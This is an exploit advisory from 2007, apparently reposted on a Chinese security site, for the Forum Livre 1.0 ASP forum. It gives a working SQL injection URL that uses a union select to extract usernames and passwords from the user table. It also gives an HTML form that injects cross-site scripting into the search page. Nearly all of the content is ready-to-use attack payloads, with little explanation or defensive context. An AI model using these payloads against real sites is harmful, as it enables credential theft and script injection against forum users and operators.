首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Forum Livre 1.0 (SQL Injection / XSS) Multiple Remote Vulnerabilities
来源:vfocus.net 作者:ajann 发布时间:2007-01-26  

*******************************************************************************
# Title : Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author : ajann
# Contact : :(
# $$ : Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

Login Before..->

http://[target]/[path]//info_user.asp?user=[SQL]

Example:

//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario

[[/SQL]]

[[XSS]]]---------------------------------------------------------

Login Before..->

http://[target]/[path]//busca2.asp (POST Method) [SQL]

Example:

<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os f?runs</option>
<option value="">F?rum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Excel Malformed Pale
·Aztek Forum 4.0 Multiple Vulne
·Xero Portal (phpbb_root_path)
·Oracle <= 9i / 10g (read/wr
·MS Windows Explorer (AVI) Unsp
·AT-TFTP <= 1.9 (Long Filena
·PA168 Chipset IP Phones Weak S
·ProFTPD 1.3.0 (sreplace) Remot
·Sami HTTP Server 2.0.1 (HTTP 4
·PHP <= 4.4.4/5.1.6 htmlenti
·Mac OS X 10.4.8 (UserNotificat
·Evince Document Viewer (Docume
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved